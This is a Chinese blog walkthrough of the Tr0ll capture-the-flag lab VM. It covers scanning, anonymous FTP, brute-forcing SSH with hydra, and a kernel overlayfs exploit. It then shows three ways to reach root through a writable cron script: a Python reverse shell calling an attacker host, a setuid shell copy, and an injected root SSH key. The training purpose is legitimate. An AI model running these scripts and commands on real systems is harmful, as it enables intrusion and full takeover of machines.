No.4-红队渗透项目:Tr0ll

2024-04-26 890 0

简介

作者:摇光

时间:2024-04-17

座右铭:路虽远,行则将至,事虽难,做则必成。

请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一.信息收集

在VM中获取攻击目标的ip地址,用nmap获取目标主机的ip地址

nmap -sP 192.168.111.0/24

No.4-红队渗透项目:Tr0ll插图

目标主机的ip:192.168.111.136

对目标主机进行全端口扫描

nmap 192.168.111.136 -p-

No.4-红队渗透项目:Tr0ll插图1

扫描其端口更详细的信息,包括版本号及其它信息

nmap 192.168.111.136 -p- -sS -sV -A

No.4-红队渗透项目:Tr0ll插图2

扫描发现ftp存在lol.pcap流量文件,还有FTP带有匿名登录名:Anonymous FTP login allowed,80http存在robots.txt和/secret目录文件。

1)ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap

2)22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
3)80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/secret

登录FTP枚举:ftp 192.168.111.136
账号密码:
Anonymous
Anonymous

No.4-红队渗透项目:Tr0ll插图3

下载lol.pcap流量文件到本地

wireshark流量分析:wireshark lol.pcap

No.4-红队渗透项目:Tr0ll插图4

wireshark对流量界面右键->追踪流量->TCP流量!

No.4-红队渗透项目:Tr0ll插图5

获得secret_stuff.txt文件

tcp.stream eq 2

No.4-红队渗透项目:Tr0ll插图6

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛

Sucks, you were so close... gotta TRY HARDER!

谷歌翻译:好吧好吧,你不是一个聪明的小恶魔吗,你差点就找到了sup3rs3cr3tdirlol 😛 糟了,你已经很接近了...必须再努力一点!

浏览器访问http://192.168.111.136/sup3rs3cr3tdirlol/(http://192.168.111.136/secret_stuff.txt浏览器无法访问)

No.4-红队渗透项目:Tr0ll插图7

下载保存roflmao文件到本地,strings 进行分析该文件(file roflmao    ---枚举发现是32位的ELF 二进制文件)

No.4-红队渗透项目:Tr0ll插图8

发现Find address 0x0856BF to proceed

页面枚举http://10.211.55.32/0x0856BF/

No.4-红队渗透项目:Tr0ll插图9

存在两页页面:good_luck/   this_folder_contains_the_password/

浏览http://192.168.111.136/0x0856BF/good_luck/which_one_lol.txt

No.4-红队渗透项目:Tr0ll插图10

浏览http://192.168.111.136/0x0856BF/this_folder_contains_the_password/Pass.txt

No.4-红队渗透项目:Tr0ll插图11

二、web渗透

初步猜测是用户密码hydra爆破

hydra爆破

vi yaoguang2.txt

No.4-红队渗透项目:Tr0ll插图12

保存退出:esc--> :wq! -->enter

hydra -L yaoguang2.txt -p Pass.txt 192.168.111.136 ssh

No.4-红队渗透项目:Tr0ll插图13

获得用户名

login: overflow   password: Pass.txt

登录系统ssh

ssh [email protected]

No.4-红队渗透项目:Tr0ll插图14

将伪shell变为正常shell:python -c 'import pty;pty.spawn("/bin/bash")'

查看当前权限:id

查看系统版本:uname -a

No.4-红队渗透项目:Tr0ll插图15

三、内核提权

在kali中查看当前版本的exp

searchsploit linux ubuntu 3.13.0

No.4-红队渗透项目:Tr0ll插图16

只有两个符合的
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                                        | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)                   | linux/local/37293.txt

利用37292.c:

拷贝37392.c到本地

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/Desktop/

No.4-红队渗透项目:Tr0ll插图17

No.4-红队渗透项目:Tr0ll插图18

它会自动结束ssh进程,而且还是整点提示!说明有计划任务在自动到点结束进程。每5分钟就被踢一次!

wget http://192.168.111.128:8081/37292.c

No.4-红队渗透项目:Tr0ll插图19

编译提权脚本:gcc 37292.c -o dayu1

运行提权脚本:./dayu1

No.4-红队渗透项目:Tr0ll插图20

切换到root权限,查看flag

No.4-红队渗透项目:Tr0ll插图21

flag:702a8c18d29c6f3ca0d99ef5712bfbdc

拓展:

Broadcast Message from root@trol                                               
(somewhere) at 23:35 ...                                               

TIMES UP LOL!                                                                  

Connection to 192.168.111.136 closed by remote host.
Connection to 192.168.111.136 closed.
----
它会自动结束ssh进程,而且还是整点提示!说明有计划任务在自动到点结束进程。每5分钟就被踢一次!

find / -name cronlog 2>/dev/null    ---查看计划任务日志信息

No.4-红队渗透项目:Tr0ll插图22

find / -name cleaner.py 2>/dev/null   ---查看文件在哪儿

No.4-红队渗透项目:Tr0ll插图23

find / -writable 2>/dev/null   ---枚举所有可写入权限的文件

No.4-红队渗透项目:Tr0ll插图24

No.4-红队渗透项目:Tr0ll插图25

知道了计划任务和py脚本可写入,以及py的位置后,下来演示其它三种提权方法:
1)反弹shell
2)创建root可执行程序,获得root权限
3)写入ssh rsa,ssh登录root用户

方法一:反弹shell进行提权

使用nano进行写入反弹shell脚本,vi一般无法写入,这里使用nano

nano /lib/log/cleaner.py

No.4-红队渗透项目:Tr0ll插图26

No.4-红队渗透项目:Tr0ll插图27

反弹shell提权脚本

def con():
import socket, time,pty, os
host='10.211.55.19'
port=9999
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host,port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
con()

保存退出:

ctal x|y
---------

获得反弹shell,切换到root权限,获得flag

nc -tvlp 9999

No.4-红队渗透项目:Tr0ll插图28

方法二:创建root可执行程序,获得root权限

nano /lib/log/cleaner.py         --进入计划任务文件

os.system('cp /bin/sh /tmp/dayu1')
os.system('chmod u+s /tmp/dayu1')

No.4-红队渗透项目:Tr0ll插图29

ctrl x|y 保存

打开新的标签

ssh [email protected]

输入密码:Pass.txt

将伪shell变为正常shell

python -c 'import pty;pty.spawn("/bin/bash")'

切换为tmp模式下

cd /tmp

查看是否已经生成sh文件

ls

运行sh文件

./sh

切换到root权限,查看flag

cd /root
ls
cat proof.txt

No.4-红队渗透项目:Tr0ll插图30

方法三:写入ssh rsa,ssh登录root用户进行提权

ssh-keygen   ---全部空格回车

No.4-红队渗透项目:Tr0ll插图31

cd ~/.ssh

ls

cat id_rsa.pub

No.4-红队渗透项目:Tr0ll插图32

nano /lib/log/cleaner.py         --进入计划任务文件

将try:中的内容改为

mkdir /root/.ssh; chmod 775 .ssh; echo "加上 id_rsa.pub产生的密匙内容上图有例子" >> /root/.ssh/authorized_keys

如:

os.system('mkdir /root/.ssh; chmod 775 .ssh; echo

"b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbuZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAw2Wzyn2KSHkBLY69REAgd6Y8BtXzxAAOW7eyDQnfQAAAAlyb290QGthbGk=
" >> /root/.ssh/authorized_keys ')

等几分钟,远程到root权限则无需密码

ssh [email protected] 

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论